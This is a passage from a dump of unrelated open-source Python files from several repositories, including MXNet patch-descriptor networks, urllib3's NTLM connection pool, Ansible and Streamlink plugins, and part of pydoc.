return run_sql("SELECT name FROM rnkMETHOD ORDER BY name")
def perform_modifytranslations(ln, bsrID, trans=None, confirm=0):
"""Modify the translations of a sort method"""
_ = gettext_set_language(ln)
output = create_important_box('<p>If you have questions, please see the %s.</p>' %get_admin_guide_link(ln), '#66CCFF')
sel_type = 'ln' #Long name
table_name = 'bsrMETHOD'
sitelangs = get_languages()
if not trans:
trans = []
if type(trans) is str:
trans = [trans]
if confirm == 2 and bsrID:
finresult = modify_translations(bsrID, sitelangs, sel_type, trans, table_name)
bsr_dict = dict(get_i8n_name(bsrID, ln, sel_type, table_name))
if bsrID and bsr_dict.has_key(bsrID):
header = ['Language', 'Translation']
actions = []
if not confirm:
trans = []
for (key, dummy) in sitelangs:
try:
trans.append(get_i8n_name(bsrID, key, sel_type, table_name)[0][1])
except StandardError:
trans.append('')
for i in range(0, len(sitelangs)):
actions.append(["%s %s" % (sitelangs[i][1], (sitelangs[i][0]==CFG_SITE_LANG and '<small>(def)</small>' or ''))])
actions[-1].append('<input type="text" name="trans" size="30" value="%s"/>' % trans[i])
text = tupletotable(header=header, tuple=actions)
output += createhiddenform(action="modifytranslations",
text=text,
button="Modify",
bsrID=bsrID,
ln=ln,
confirm=2)
if sel_type and len(trans) and confirm == 2:
output += write_outcome(finresult)
return output
|
0k/OpenUpgrade
|
refs/heads/8.0
|
addons/account_asset/report/__init__.py
|
445
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_asset_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
galad-loth/LearnDescriptor
|
refs/heads/master
|
patchmatch/feat_net.py
|
1
|
# -*- codingL utf-8-*-
"""
Created on Tue Sep 25 11:28:35 2018
@author: galad-loth
"""
import mxnet as mx
def featnet1(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight shareing in Siamse/Triplet structure, pre-defined weights and bias
variables are required.
The feature net is designed to process "big" patches (e.g. 64 x 64)
args:
data: input data
conv_weight: pre-defined weights for convolutional layers
conv_bias: pre-defined bias for convolutional layers
name_prefix: when multi-branch is needed, this is used to distinguish variables
in different branches
returns:
A feature net with 3 convolutional layer and 2 pooling layer.
"""
net=mx.sym.Convolution(data=data, kernel=(7,7), stride=(3,3),
pad=(3,3),num_filter=96, weight=conv_weight[0],
bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(5,5),stride=(1,1),
pad=(2,2), num_filter=192, weight=conv_weight[1],
bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu1")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool1")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=256, weight=conv_weight[2],
bias=conv_bias[2], name=name_prefix+"conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu2")
return net
def featnet2(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight shareing in Siamse/Triplet structure, pre-defined weights and bias
variables are required.
The feature net is designed to process "mid-size" patches (e.g. 32 x 32)
args:
data: input data
conv_weight: pre-defined weights for convolutional layers
conv_bias: pre-defined bias for convolutional layers
name_prefix: when multi-branch is needed, this is used to distinguish variables
in different branches
returns:
A feature net with 4 convolutional layer and 2 pooling layer.
"""
net=mx.sym.Convolution(data=data, kernel=(5,5), stride=(1,1),
pad=(2,2), num_filter=96, weight=conv_weight[0],
bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2), name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(3,3), stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[1],
bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu1")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2), name=name_prefix+"maxpool1")
net=mx.sym.Convolution(data=net, kernel=(3,3), stride=(1,1),
pad=(1,1), num_filter=192, weight=conv_weight[2],
bias=conv_bias[2], name=name_prefix+"conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu2")
net=mx.sym.Convolution(data=net, kernel=(3,3), stride=(1,1),
pad=(1,1), num_filter=192, weight=conv_weight[3],
bias=conv_bias[3], name=name_prefix+"conv3")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu3")
return net
def featnet3(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight shareing in Siamse/Triplet structure, pre-defined weights and bias
variables are required.
This feature net desgined to process "large-size" patches(e.g. 64 x 64)
args:
data: input data
conv_weight: pre-defined weights for covolutional layers
conv_bias: pre-defined bias for covolutional layers
name_prefix: when multi-branch is needed, this is used to
distinguish variables in different branches
returns:
A feature net with 7 convolutional layer and 1 pooling layer.
"""
net = mx.sym.Convolution(data=data, kernel=(5, 5), stride=(3,3),
pad=(2, 2), num_filter=64, weight=conv_weight[0],
bias=conv_bias[0],name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[1],
bias=conv_bias[1],name=name_prefix+"s1_conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s1_relu0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[2],
bias=conv_bias[2],name=name_prefix+"s1_conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s1_relu1")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[3],
bias=conv_bias[3],name=name_prefix+"s1_conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s1_relu2")
net = mx.sym.Pooling(data=net, kernel=(2,2),pool_type="max",
stride=(2,2), name=name_prefix+"maxpool0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[4],
bias=conv_bias[4],name=name_prefix+"s2_conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s2_relu0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[5],
bias=conv_bias[5],name=name_prefix+"s2_conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s2_relu1")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[6],
bias=conv_bias[6],name=name_prefix+"s2_conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s2_relu2")
return net
def featnet4(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight sharing in Siamse/Triplet structure, pre-defined weights
and bias variables are required.
This structure is used by PN-Net/DeepCD.
args:
data: input data
conv_weight: pre-defined weights for covolutional layers
conv_bias: pre-defined bias for covolutional layers
name_prefix: when multi-branch is needed, this is used to
distinguish variables in different branches
returns:
A feature net with 2 convolutional layer and 1 pooling layer.
"""
net=mx.sym.Convolution(data=data, kernel=(7,7), stride=(1,1), num_filter=32,
weight=conv_weight[0], bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="tanh", name=name_prefix+"tanh0")
net = mx.sym.Pooling(data=net, kernel=(2,2),pool_type="max",
stride=(2,2), name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(6,6), stride=(1,1), num_filter=64,
weight=conv_weight[1], bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="tanh", name=name_prefix+"tanh1")
return net
def featnet5(data, conv_weight, conv_bias, feat_dim=512, name_prefix=""):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight sharing in Siamse/Triplet structure, pre-defined weights
and bias variables are required.
This structure is used by match_net.
args:
data: input data
conv_weight: pre-defined weights for covolutional layers
conv_bias: pre-defined bias for covolutional layers
feat_dim:the dimensional of the extracted feature
name_prefix: when multi-branch is needed, this is used to
distinguish variables in different branches
returns:
A feature net with 5 convolutional layer and 3 pooling layer.
"""
net=mx.sym.Convolution(data=data, kernel=(7,7), stride=(1,1),
pad=(3,3),num_filter=24, weight=conv_weight[0],
bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(5,5),stride=(1,1),
pad=(2,2), num_filter=64, weight=conv_weight[1],
bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu1")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool1")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[2],
bias=conv_bias[2], name=name_prefix+"conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu2")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[3],
bias=conv_bias[3], name=name_prefix+"conv3")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu3")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[4],
bias=conv_bias[4], name=name_prefix+"conv4")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu4")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool2")
net = mx.sym.Flatten(data=net)
net = mx.sym.FullyConnected(data=net,num_hidden=feat_dim, weight=conv_weight[5],
bias=conv_bias[5],name=name_prefix+"bottleneck")
return net
if __name__=="__main__":
data=mx.sym.Variable("data")
conv_weight=[]
conv_bias=[]
for i in range(6):
conv_weight.append(mx.sym.Variable("conv"+str(i)+"_weight"))
conv_bias.append(mx.sym.Variable("conv"+str(i)+"_bias"))
feat_net=featnet5(data, conv_weight, conv_bias,name_prefix="feat_")
ex=feat_net.simple_bind(ctx=mx.cpu(), data=(50, 3, 64, 64))
|
ntt-sic/neutron
|
refs/heads/master
|
neutron/plugins/mlnx/common/__init__.py
|
139
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
bfrgoncalves/Online-PhyloViZ
|
refs/heads/master
|
node_modules/l/node_modules/hook.io/node_modules/npm/node_modules/node-gyp/gyp/test/same-gyp-name/gyptest-default.py
|
318
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Build a .gyp that depends on 2 gyp files with the same name.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('all.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('all.gyp', chdir='relocate/src')
expect1 = """\
Hello from main1.cc
"""
expect2 = """\
Hello from main2.cc
"""
if test.format == 'xcode':
chdir1 = 'relocate/src/subdir1'
chdir2 = 'relocate/src/subdir2'
else:
chdir1 = chdir2 = 'relocate/src'
test.run_built_executable('program1', chdir=chdir1, stdout=expect1)
test.run_built_executable('program2', chdir=chdir2, stdout=expect2)
test.pass_test()
|
edensparkles/FIRSTAID
|
refs/heads/master
|
FIRST_AID/venv/Lib/site-packages/pip/_vendor/requests/packages/urllib3/contrib/ntlmpool.py
|
514
|
"""
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
from __future__ import absolute_import
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
"""
Implements an NTLM authentication version of an urllib3 connection pool
"""
scheme = 'https'
def __init__(self, user, pw, authurl, *args, **kwargs):
"""
authurl is a random URL on the server that is protected by NTLM.
user is the Windows user, probably in the DOMAIN\\username format.
pw is the password for the user.
"""
super(NTLMConnectionPool, self).__init__(*args, **kwargs)
self.authurl = authurl
self.rawuser = user
user_parts = user.split('\\', 1)
self.domain = user_parts[0].upper()
self.user = user_parts[1]
self.pw = pw
def _new_conn(self):
# Performs the NTLM handshake that secures the connection. The socket
# must be kept open while requests are performed.
self.num_connections += 1
log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s',
self.num_connections, self.host, self.authurl)
headers = {}
headers['Connection'] = 'Keep-Alive'
req_header = 'Authorization'
resp_header = 'www-authenticate'
conn = HTTPSConnection(host=self.host, port=self.port)
# Send negotiation message
headers[req_header] = (
'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
reshdr = dict(res.getheaders())
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', reshdr)
log.debug('Response data: %s [...]', res.read(100))
# Remove the reference to the socket, so that it can not be closed by
# the response object (we want to keep the socket open)
res.fp = None
# Server should respond with a challenge message
auth_header_values = reshdr[resp_header].split(', ')
auth_header_value = None
for s in auth_header_values:
if s[:5] == 'NTLM ':
auth_header_value = s[5:]
if auth_header_value is None:
raise Exception('Unexpected %s response header: %s' %
(resp_header, reshdr[resp_header]))
# Send authentication message
ServerChallenge, NegotiateFlags = \
ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
self.user,
self.domain,
self.pw,
NegotiateFlags)
headers[req_header] = 'NTLM %s' % auth_msg
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', dict(res.getheaders()))
log.debug('Response data: %s [...]', res.read()[:100])
if res.status != 200:
if res.status == 401:
raise Exception('Server rejected request: wrong '
'username or password')
raise Exception('Wrong server response: %s %s' %
(res.status, res.reason))
res.fp = None
log.debug('Connection established')
return conn
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True):
if headers is None:
headers = {}
headers['Connection'] = 'Keep-Alive'
return super(NTLMConnectionPool, self).urlopen(method, url, body,
headers, retries,
redirect,
assert_same_host)
|
stevenewey/django
|
refs/heads/master
|
tests/urlpatterns_reverse/included_urls.py
|
452
|
from django.conf.urls import url
from .views import empty_view
urlpatterns = [
url(r'^$', empty_view, name="inner-nothing"),
url(r'^extra/(?P<extra>\w+)/$', empty_view, name="inner-extra"),
url(r'^(?P<one>[0-9]+)|(?P<two>[0-9]+)/$', empty_view, name="inner-disjunction"),
]
|
eduardocereto/pyboleto
|
refs/heads/master
|
pyboleto/django/views.py
|
6027
|
# Create your views here.
|
OPM/opm-common
|
refs/heads/master
|
python/pybind11/pybind11/_version.py
|
10
|
version_info = (2, 3, 0)
__version__ = '.'.join(map(str, version_info))
|
brendandahl/servo
|
refs/heads/master
|
tests/wpt/css-tests/tools/pywebsocket/src/test/testdata/handlers/sub/wrong_transfer_sig_wsh.py
|
499
|
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Wrong web_socket_transfer_data() signature.
"""
def web_socket_do_extra_handshake(request):
pass
def no_web_socket_transfer_data(request):
request.connection.write(
'sub/wrong_transfer_sig_wsh.py is called for %s, %s' %
(request.ws_resource, request.ws_protocol))
# vi:sts=4 sw=4 et
|
bastimeyer/streamlink
|
refs/heads/master
|
src/streamlink/plugin/api/mapper.py
|
7
|
from functools import partial
from itertools import product
from operator import eq
class StreamMapper(object):
"""The stream mapper can be used to simplify the process of creating
stream objects from data.
:param cmp: This callable is used to compare each mapping's key
with a value.
"""
def __init__(self, cmp=eq):
self._map = []
self._cmp = cmp
def map(self, key, func, *args, **kwargs):
"""Creates a key-function mapping.
The return value from the function should be either
- A tuple containing a name and stream
- A iterator of tuples containing a name and stream
Any extra arguments will be passed to the function.
"""
self._map.append((key, partial(func, *args, **kwargs)))
def _cmp_filter(self, args):
value, (key, func) = args
return self._cmp(key, value)
def _mapped_func(self, args):
value, (key, func) = args
return func(value)
def __call__(self, values):
"""Runs through each value and transform it with a mapped function."""
values = product(values, self._map)
for value in map(self._mapped_func, filter(self._cmp_filter, values)):
if isinstance(value, tuple) and len(value) == 2:
yield value
else:
try:
if isinstance(value, dict):
for __ in value.items():
yield __
else:
for __ in value:
yield __
except TypeError:
# Non-iterable returned
continue
|
thnee/ansible
|
refs/heads/devel
|
lib/ansible/plugins/callback/skippy.py
|
83
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: skippy
callback_type: stdout
requirements:
- set as main display callback
short_description: Ansible screen output that ignores skipped status
version_added: "2.0"
deprecated:
why: The 'default' callback plugin now supports this functionality
removed_in: '2.11'
alternative: "'default' callback plugin with 'display_skipped_hosts = no' option"
extends_documentation_fragment:
- default_callback
description:
- This callback does the same as the default except it does not output skipped host/task/item status
'''
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
class CallbackModule(CallbackModule_default):
'''
This is the default callback interface, which simply prints messages
to stdout when new callback events are received.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'skippy'
def v2_runner_on_skipped(self, result):
pass
def v2_runner_item_on_skipped(self, result):
pass
|
grap/purchase-workflow
|
refs/heads/8.0
|
purchase_requisition_delivery_address/model/__init__.py
|
36
|
# -*- coding: utf-8 -*-
from . import purchase_requisition
|
ecoal95/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/service-workers/service-worker/resources/update-registration-with-type.py
|
21
|
def classic_script():
return """
importScripts('./imported-classic-script.js');
self.onmessage = e => {
e.source.postMessage(imported);
};
"""
def module_script():
return """
import * as module from './imported-module-script.js';
self.onmessage = e => {
e.source.postMessage(module.imported);
};
"""
# Returns the classic script for a first request and
# returns the module script for second and subsequent requests.
def main(request, response):
headers = [('Content-Type', 'application/javascript'),
('Pragma', 'no-store'),
('Cache-Control', 'no-store')]
classic_first = request.GET['classic_first']
key = request.GET['key']
requested_once = request.server.stash.take(key)
if requested_once is None:
request.server.stash.put(key, True)
body = classic_script() if classic_first == '1' else module_script()
else:
body = module_script() if classic_first == '1' else classic_script()
return 200, headers, body
|
tboyce021/home-assistant
|
refs/heads/dev
|
homeassistant/components/blueprint/__init__.py
|
3
|
"""The blueprint integration."""
from . import websocket_api
from .const import DOMAIN # noqa
from .errors import ( # noqa
BlueprintException,
BlueprintWithNameException,
FailedToLoad,
InvalidBlueprint,
InvalidBlueprintInputs,
MissingInput,
)
from .models import Blueprint, BlueprintInputs, DomainBlueprints # noqa
from .schemas import is_blueprint_instance_config # noqa
async def async_setup(hass, config):
"""Set up the blueprint integration."""
websocket_api.async_setup(hass)
return True
|
bmi-forum/bmi-pyre
|
refs/heads/master
|
pythia-0.8/packages/blade/blade/components/__init__.py
|
2
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# version
__id__ = "$Id: __init__.py,v 1.1.1.1 2005/03/08 16:13:56 aivazis Exp $"
# End of file
|
40223150/2015cd_0505
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/pydoc.py
|
637
|
#!/usr/bin/env python3
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import builtins
import imp
import importlib.machinery
#brython fix me
import inspect
import io
import os
#brython fix me
#import pkgutil
import platform
import re
import sys
import time
import tokenize
import warnings
from collections import deque
from reprlib import Repr
#fix me brython
#from traceback import extract_tb, format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
#fix me brython
#return _re_stripid.sub(r'\1', text)
return text
def _is_some_method(obj):
return (inspect.isfunction(obj) or
inspect.ismethod(obj) or
inspect.isbuiltin(obj) or
inspect.ismethoddescriptor(obj))
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant or internal.
if name in {'__author__', '__builtins__', '__cached__', '__credits__',
'__date__', '__doc__', '__file__', '__initializing__',
'__loader__', '__module__', '__name__', '__package__',
'__path__', '__qualname__', '__slots__', '__version__'}:
return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return True
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
try:
file = tokenize.open(filename)
except IOError:
# module can't be opened, so skip it
return None
binary_suffixes = importlib.machinery.BYTECODE_SUFFIXES[:]
binary_suffixes += importlib.machinery.EXTENSION_SUFFIXES[:]
if any(filename.endswith(x) for x in binary_suffixes):
# binary modules have to be imported
file.close()
if any(filename.endswith(x) for x in
importlib.machinery.BYTECODE_SUFFIXES):
loader = importlib.machinery.SourcelessFileLoader('__temp__',
filename)
else:
loader = importlib.machinery.ExtensionFileLoader('__temp__',
filename)
try:
module = loader.load_module('__temp__')
except:
return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else:
# text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
